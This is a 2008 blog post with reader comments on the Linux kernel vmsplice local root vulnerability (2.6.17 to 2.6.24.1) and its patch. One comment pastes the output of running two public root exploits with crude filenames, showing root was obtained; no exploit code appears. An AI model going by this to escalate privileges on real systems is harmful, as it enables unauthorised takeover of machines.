Root exploit for Linux 2.6.24.1
Posted by micele - 11/02/08 at 12:02:34 pm
It’s time for a new local root exploit on the linux kernel. Two exploits have been reported. Both are based on leaky dealing with pointers regarding the function vmsplice, brought in by kernel release 2.6.17. For this reason one of the exploits works for all kernel versions from 2.6.17 to 2.6.24.1. Kernel Bug Tracker says:
Both exploits cause kernel Oops or (randomly) give root privilegies to the user.
A new kernel version 2.6.24.2 has been released and the regarding changelog reports a kind of fix. But comments like
But we also must check whether we can access the actual memory region pointed to by the struct iovec to fix the access checks properly.
still don’t sound like 100% fixed and reliable…
3 Comments »
RSS feed for comments on this post. TrackBack URI
Leave a comment
-
Search
Powered by WordPress with GimpStyle Theme design by Horacio Bella. Get Entries and comments.
Sollte Jemand zu Faul sein(so wie ich) um sich einen neuen Kernel zu kompilieren findet hier schnell abhilfe:
http://www.hostblogger.de/blog/archives/2798-Bug-root...
Comment by Dietrich — February 11, 2008 #
…cking/kernel-2.6 > ./jessica_biel_naked_in_my_bed
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7ece000 .. 0xb7f00000
[+] root
root@lapetos kernel-2.6 $
and
…cking/kernel-2.6 > ./diane_lane_fucked_hard
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] addr: 0xc0111a4d
[+] root
root@lapetos kernel-2.6 $
first compile and first try, each!
Comment by bene — February 11, 2008 #
http://lwn.net/SubscriberLink/268783/6928eb6921800e25/ - da gibts noch eine genauere erklaerung des vuln.
Comment by soeren — February 15, 2008 #